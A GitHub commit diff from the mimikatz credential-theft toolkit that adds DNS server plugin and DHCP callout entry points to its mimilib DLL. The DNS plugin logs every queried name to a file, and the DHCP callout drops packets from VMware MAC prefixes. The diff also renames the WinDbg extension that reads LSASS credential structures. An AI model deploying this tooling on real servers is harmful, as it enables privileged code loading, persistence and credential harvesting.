Skip to content

Commit 22eaf29

Browse files
committed
[new] mimilib now supports DHCP Callout, DNS Plugin, Coffee
1 parent 4c70f14 commit 22eaf29

14 files changed

+2458
-19
lines changed

inc/DhcpSSdk.h

+495
Large diffs are not rendered by default.

inc/cardmod.h

+1,799
Large diffs are not rendered by default.

inc/globals.h

+4
Original file line numberDiff line numberDiff line change
@@ -70,6 +70,10 @@ DWORD MIMIKATZ_NT_MAJOR_VERSION, MIMIKATZ_NT_MINOR_VERSION, MIMIKATZ_NT_BUILD_NU
7070
#define MS_ENH_RSA_AES_PROV_XP L"Microsoft Enhanced RSA and AES Cryptographic Provider (Prototype)"
7171
#endif
7272

73+
#ifndef SCARD_PROVIDER_CARD_MODULE
74+
#define SCARD_PROVIDER_CARD_MODULE 0x80000001
75+
#endif
76+
7377
#define RtlEqualGuid(L1, L2) (RtlEqualMemory(L1, L2, sizeof(GUID)))
7478

7579
#define SIZE_ALIGN(size, alignment) (size + ((size % alignment) ? (alignment - (size % alignment)) : 0))

mimikatz.sln

+2
Original file line numberDiff line numberDiff line change
@@ -12,7 +12,9 @@ Project("{2150E333-8FDC-42A3-9474-1A3956D46DE8}") = "global files", "global file
1212
EndProject
1313
Project("{2150E333-8FDC-42A3-9474-1A3956D46DE8}") = "inc", "inc", "{282B4B77-BFF6-4DCA-9A60-6F4036929AEE}"
1414
ProjectSection(SolutionItems) = preProject
15+
inc\cardmod.h = inc\cardmod.h
1516
inc\DbgHelp.h = inc\DbgHelp.h
17+
inc\DhcpSSdk.h = inc\DhcpSSdk.h
1618
inc\DsGetDC.h = inc\DsGetDC.h
1719
inc\globals.h = inc\globals.h
1820
inc\Midles.h = inc\Midles.h

mimilib/kdhcp.c

+56
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,56 @@
1+
/* Benjamin DELPY `gentilkiwi`
2+
http://blog.gentilkiwi.com
3+
benjamin@gentilkiwi.com
4+
Licence : https://creativecommons.org/licenses/by/4.0/
5+
*/
6+
#include "kdhcp.h"
7+
8+
HMODULE kdhcp_nextLibrary = NULL;
9+
LPDHCP_NEWPKT kdhcp_nextLibraryCalloutNewPkt = NULL;
10+
11+
BOOL APIENTRY DllMain(HMODULE hModule, DWORD ul_reason_for_call, LPVOID lpReserved)
12+
{
13+
if((ul_reason_for_call == DLL_PROCESS_DETACH) && kdhcp_nextLibrary)
14+
FreeLibrary(kdhcp_nextLibrary);
15+
return TRUE;
16+
}
17+
18+
DWORD CALLBACK kdhcp_DhcpServerCalloutEntry(IN LPWSTR ChainDlls, IN DWORD CalloutVersion, IN OUT LPDHCP_CALLOUT_TABLE CalloutTbl)
19+
{
20+
LPDHCP_ENTRY_POINT_FUNC nextEntry;
21+
RtlZeroMemory(CalloutTbl, sizeof(DHCP_CALLOUT_TABLE));
22+
23+
if(ChainDlls)
24+
if(kdhcp_nextLibrary = LoadLibrary(ChainDlls))
25+
if(nextEntry = (LPDHCP_ENTRY_POINT_FUNC) GetProcAddress(kdhcp_nextLibrary, DHCP_CALLOUT_ENTRY_POINT))
26+
nextEntry(ChainDlls + lstrlenW(ChainDlls) + 1, CalloutVersion, CalloutTbl);
27+
28+
if(CalloutTbl->DhcpNewPktHook)
29+
kdhcp_nextLibraryCalloutNewPkt = CalloutTbl->DhcpNewPktHook;
30+
CalloutTbl->DhcpNewPktHook = kdhcp_DhcpNewPktHook;
31+
32+
return ERROR_SUCCESS;
33+
}
34+
35+
const BYTE macToBlack[][MAC_ADDRESS_SIZE] = {
36+
{0x00, 0x0c, 0x29, 0x00, 0x00, 0x00},
37+
{0x00, 0x50, 0x56, 0x00, 0x00, 0x00}
38+
};
39+
DWORD CALLBACK kdhcp_DhcpNewPktHook(IN OUT LPBYTE *Packet, IN OUT DWORD *PacketSize, IN DWORD IpAddress, IN LPVOID Reserved, IN OUT LPVOID *PktContext, OUT LPBOOL ProcessIt)
40+
{
41+
DWORD status = ERROR_SUCCESS, m;
42+
*ProcessIt = TRUE;
43+
44+
for(m = 0; m < ARRAYSIZE(macToBlack); m++)
45+
{
46+
if(RtlEqualMemory(*Packet + MAC_SOURCE_ADDRESS_OFFSET, macToBlack[m], MAC_ADDRESS_SIZE / 2)) // just the start of the address
47+
{
48+
*ProcessIt = FALSE;
49+
status = DHCP_DROP_INVALID;
50+
break;
51+
}
52+
}
53+
if(kdhcp_nextLibraryCalloutNewPkt && *ProcessIt)
54+
status = kdhcp_nextLibraryCalloutNewPkt(Packet, PacketSize, IpAddress, Reserved, PktContext, ProcessIt);
55+
return status;
56+
}

mimilib/kdhcp.h

+14
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,14 @@
1+
/* Benjamin DELPY `gentilkiwi`
2+
http://blog.gentilkiwi.com
3+
benjamin@gentilkiwi.com
4+
Licence : https://creativecommons.org/licenses/by/4.0/
5+
*/
6+
#include "utils.h"
7+
#include <dhcpssdk.h>
8+
9+
#define MAC_ADDRESS_SIZE 6
10+
#define MAC_SOURCE_ADDRESS_OFFSET 28
11+
12+
BOOL APIENTRY DllMain(HMODULE hModule, DWORD ul_reason_for_call, LPVOID lpReserved);
13+
DWORD CALLBACK kdhcp_DhcpServerCalloutEntry(IN LPWSTR ChainDlls, IN DWORD CalloutVersion, IN OUT LPDHCP_CALLOUT_TABLE CalloutTbl);
14+
DWORD CALLBACK kdhcp_DhcpNewPktHook(IN OUT LPBYTE *Packet, IN OUT DWORD *PacketSize, IN DWORD IpAddress, IN LPVOID Reserved, IN OUT LPVOID *PktContext, OUT LPBOOL ProcessIt);

mimilib/kdns.c

+30
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,30 @@
1+
/* Benjamin DELPY `gentilkiwi`
2+
http://blog.gentilkiwi.com
3+
benjamin@gentilkiwi.com
4+
Licence : https://creativecommons.org/licenses/by/4.0/
5+
*/
6+
#include "kdns.h"
7+
8+
DWORD WINAPI kdns_DnsPluginInitialize(PLUGIN_ALLOCATOR_FUNCTION pDnsAllocateFunction, PLUGIN_FREE_FUNCTION pDnsFreeFunction)
9+
{
10+
return ERROR_SUCCESS;
11+
}
12+
13+
DWORD WINAPI kdns_DnsPluginCleanup()
14+
{
15+
return ERROR_SUCCESS;
16+
}
17+
18+
DWORD WINAPI kdns_DnsPluginQuery(PSTR pszQueryName, WORD wQueryType, PSTR pszRecordOwnerName, PDB_RECORD *ppDnsRecordListHead)
19+
{
20+
FILE * kdns_logfile;
21+
#pragma warning(push)
22+
#pragma warning(disable:4996)
23+
if(kdns_logfile = _wfopen(L"kiwidns.log", L"a"))
24+
#pragma warning(pop)
25+
{
26+
klog(kdns_logfile, L"%S (%hu)\n", pszQueryName, wQueryType);
27+
fclose(kdns_logfile);
28+
}
29+
return ERROR_SUCCESS;
30+
}

mimilib/kdns.h

+19
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,19 @@
1+
/* Benjamin DELPY `gentilkiwi`
2+
http://blog.gentilkiwi.com
3+
benjamin@gentilkiwi.com
4+
Licence : https://creativecommons.org/licenses/by/4.0/
5+
*/
6+
#pragma once
7+
#include "utils.h"
8+
9+
#define PLUGIN_ALLOCATOR_FUNCTION PVOID
10+
#define PLUGIN_FREE_FUNCTION PVOID
11+
#define PDB_RECORD PVOID
12+
13+
DWORD WINAPI kdns_DnsPluginInitialize(PLUGIN_ALLOCATOR_FUNCTION pDnsAllocateFunction, PLUGIN_FREE_FUNCTION pDnsFreeFunction);
14+
DWORD WINAPI kdns_DnsPluginCleanup();
15+
DWORD WINAPI kdns_DnsPluginQuery(PSTR pszQueryName, WORD wQueryType, PSTR pszRecordOwnerName, PDB_RECORD *ppDnsRecordListHead);
16+
// DnsPluginQuery2
17+
// DnsPluginQueryZoneScope
18+
// DnsPluginQueryServerScope
19+
// DnsPluginQueryCacheScope

mimilib/mimilib.def

+13-4
Original file line numberDiff line numberDiff line change
@@ -1,11 +1,20 @@
11
LIBRARY
22
EXPORTS
33
startW = kappfree_startW
4+
45
SpLsaModeInitialize = kssp_SpLsaModeInitialize
6+
57
InitializeChangeNotify = kfilt_InitializeChangeNotify
68
PasswordChangeNotify = kfilt_PasswordChangeNotify
79

8-
WinDbgExtensionDllInit = WinDbgExtensionDllInit
9-
ExtensionApiVersion = ExtensionApiVersion
10-
11-
mimikatz = mimikatz
10+
WinDbgExtensionDllInit = kdbg_WinDbgExtensionDllInit
11+
ExtensionApiVersion = kdbg_ExtensionApiVersion
12+
coffee = kdbg_coffee
13+
mimikatz = kdbg_mimikatz
14+
15+
DnsPluginInitialize = kdns_DnsPluginInitialize
16+
DnsPluginCleanup = kdns_DnsPluginCleanup
17+
DnsPluginQuery = kdns_DnsPluginQuery
18+
19+
DhcpServerCalloutEntry = kdhcp_DhcpServerCalloutEntry
20+
DhcpNewPktHook = kdhcp_DhcpNewPktHook

mimilib/mimilib.vcxproj

+4
Original file line numberDiff line numberDiff line change
@@ -88,6 +88,8 @@
8888
</ItemGroup>
8989
<ItemGroup>
9090
<ClCompile Include="kappfree.c" />
91+
<ClCompile Include="kdhcp.c" />
92+
<ClCompile Include="kdns.c" />
9193
<ClCompile Include="kfilt.c" />
9294
<ClCompile Include="kssp.c" />
9395
<ClCompile Include="sekurlsadbg\kuhl_m_sekurlsa_nt6.c" />
@@ -99,6 +101,8 @@
99101
<ClCompile Include="utils.c" />
100102
</ItemGroup>
101103
<ItemGroup>
104+
<ClInclude Include="kdhcp.h" />
105+
<ClInclude Include="kdns.h" />
102106
<ClInclude Include="kfilt.h" />
103107
<ClInclude Include="kssp.h" />
104108
<ClInclude Include="sekurlsadbg\kuhl_m_sekurlsa_nt6.h" />

mimilib/mimilib.vcxproj.filters

+4
Original file line numberDiff line numberDiff line change
@@ -29,6 +29,8 @@
2929
<ClCompile Include="sekurlsadbg\kull_m_rpc_ms-credentialkeys.c">
3030
<Filter>sekurlsadbg</Filter>
3131
</ClCompile>
32+
<ClCompile Include="kdns.c" />
33+
<ClCompile Include="kdhcp.c" />
3234
</ItemGroup>
3335
<ItemGroup>
3436
<ClInclude Include="utils.h" />
@@ -52,6 +54,8 @@
5254
<ClInclude Include="sekurlsadbg\kull_m_rpc_ms-credentialkeys.h">
5355
<Filter>sekurlsadbg</Filter>
5456
</ClInclude>
57+
<ClInclude Include="kdns.h" />
58+
<ClInclude Include="kdhcp.h" />
5559
</ItemGroup>
5660
<ItemGroup>
5761
<Filter Include="sekurlsadbg">

mimilib/sekurlsadbg/kwindbg.c

+8-8
Original file line numberDiff line numberDiff line change
@@ -15,17 +15,12 @@ EXT_API_VERSION g_ExtApiVersion = {5 , 5 ,
1515
, 0};
1616
USHORT NtBuildNumber = 0;
1717

18-
LPEXT_API_VERSION WDBGAPI ExtensionApiVersion (void)
18+
LPEXT_API_VERSION WDBGAPI kdbg_ExtensionApiVersion(void)
1919
{
2020
return &g_ExtApiVersion;
2121
}
2222

23-
VOID CheckVersion(void)
24-
{
25-
return;
26-
}
27-
28-
VOID WDBGAPI WinDbgExtensionDllInit(PWINDBG_EXTENSION_APIS lpExtensionApis, USHORT usMajorVersion, USHORT usMinorVersion)
23+
VOID WDBGAPI kdbg_WinDbgExtensionDllInit(PWINDBG_EXTENSION_APIS lpExtensionApis, USHORT usMajorVersion, USHORT usMinorVersion)
2924
{
3025
ExtensionApis = *lpExtensionApis;
3126
NtBuildNumber = usMinorVersion;
@@ -80,7 +75,12 @@ const KUHL_M_SEKURLSA_ENUM_HELPER lsassEnumHelpers[] = {
8075
{sizeof(KIWI_MSV1_0_LIST_63), FIELD_OFFSET(KIWI_MSV1_0_LIST_63, LocallyUniqueIdentifier), FIELD_OFFSET(KIWI_MSV1_0_LIST_63, LogonType), FIELD_OFFSET(KIWI_MSV1_0_LIST_63, Session), FIELD_OFFSET(KIWI_MSV1_0_LIST_63, UserName), FIELD_OFFSET(KIWI_MSV1_0_LIST_63, Domaine), FIELD_OFFSET(KIWI_MSV1_0_LIST_63, Credentials), FIELD_OFFSET(KIWI_MSV1_0_LIST_63, pSid), FIELD_OFFSET(KIWI_MSV1_0_LIST_63, CredentialManager), FIELD_OFFSET(KIWI_MSV1_0_LIST_63, LogonTime), FIELD_OFFSET(KIWI_MSV1_0_LIST_63, LogonServer)},
8176
};
8277

83-
DECLARE_API(mimikatz)
78+
DECLARE_API(kdbg_coffee)
79+
{
80+
dprintf("\n ( (\n ) )\n .______.\n | |]\n \\ /\n `----'\n");
81+
}
82+
83+
DECLARE_API(kdbg_mimikatz)
8484
{
8585
ULONG_PTR pInitializationVector = 0, phAesKey = 0, ph3DesKey = 0, pLogonSessionList = 0, pLogonSessionListCount = 0, pSecData = 0, pDomainList = 0;
8686
PLIST_ENTRY LogonSessionList;

mimilib/sekurlsadbg/kwindbg.h

+4-4
Original file line numberDiff line numberDiff line change
@@ -59,10 +59,10 @@ typedef struct _KUHL_M_SEKURLSA_ENUM_HELPER {
5959
ULONG offsetToLogonServer;
6060
} KUHL_M_SEKURLSA_ENUM_HELPER, *PKUHL_M_SEKURLSA_ENUM_HELPER;
6161

62-
LPEXT_API_VERSION WDBGAPI ExtensionApiVersion (void);
63-
VOID CheckVersion(void);
64-
VOID WDBGAPI WinDbgExtensionDllInit (PWINDBG_EXTENSION_APIS lpExtensionApis, USHORT usMajorVersion, USHORT usMinorVersion);
65-
DECLARE_API(mimikatz);
62+
LPEXT_API_VERSION WDBGAPI kdbg_ExtensionApiVersion(void);
63+
VOID WDBGAPI kdbg_WinDbgExtensionDllInit (PWINDBG_EXTENSION_APIS lpExtensionApis, USHORT usMajorVersion, USHORT usMinorVersion);
64+
DECLARE_API(kdbg_coffee);
65+
DECLARE_API(kdbg_mimikatz);
6666

6767
VOID kuhl_m_sekurlsa_genericCredsOutput(PKIWI_GENERIC_PRIMARY_CREDENTIAL mesCreds, PLUID luid, ULONG flags);
6868
VOID kuhl_m_sekurlsa_genericKeyOutput(struct _KIWI_CREDENTIAL_KEY * key);

modules/kull_m_crypto.c

+6-3
Original file line numberDiff line numberDiff line change
@@ -131,6 +131,8 @@ BOOL kull_m_crypto_close_hprov_delete_container(HCRYPTPROV hProv)
131131
}
132132
}
133133
}
134+
if(!status)
135+
PRINT_ERROR_AUTO(L"CryptGetProvParam/CryptAcquireContextA");
134136
return status;
135137
}
136138

@@ -554,9 +556,10 @@ BOOL kull_m_crypto_DerAndKeyToPfx(LPCVOID der, DWORD derLen, LPCVOID key, DWORD
554556
CryptDestroyKey(hCryptKey);
555557
}
556558
else PRINT_ERROR_AUTO(L"CryptImportKey");
557-
CryptReleaseContext(hCryptProv, 0);
558-
if(!CryptAcquireContext(&hCryptProv, infos.pwszContainerName, NULL, PROV_RSA_FULL, CRYPT_DELETEKEYSET))
559-
PRINT_ERROR(L"Unable to delete temp keyset %s\n", infos.pwszContainerName);
559+
kull_m_crypto_close_hprov_delete_container(hCryptProv);
560+
//CryptReleaseContext(hCryptProv, 0);
561+
//if(!CryptAcquireContext(&hCryptProv, infos.pwszContainerName, NULL, PROV_RSA_FULL, CRYPT_DELETEKEYSET))
562+
// PRINT_ERROR(L"Unable to delete temp keyset %s\n", infos.pwszContainerName);
560563
}
561564
else PRINT_ERROR_AUTO(L"CryptAcquireContext");
562565
LocalFree(infos.pwszContainerName);

0 commit comments

Comments
 (0)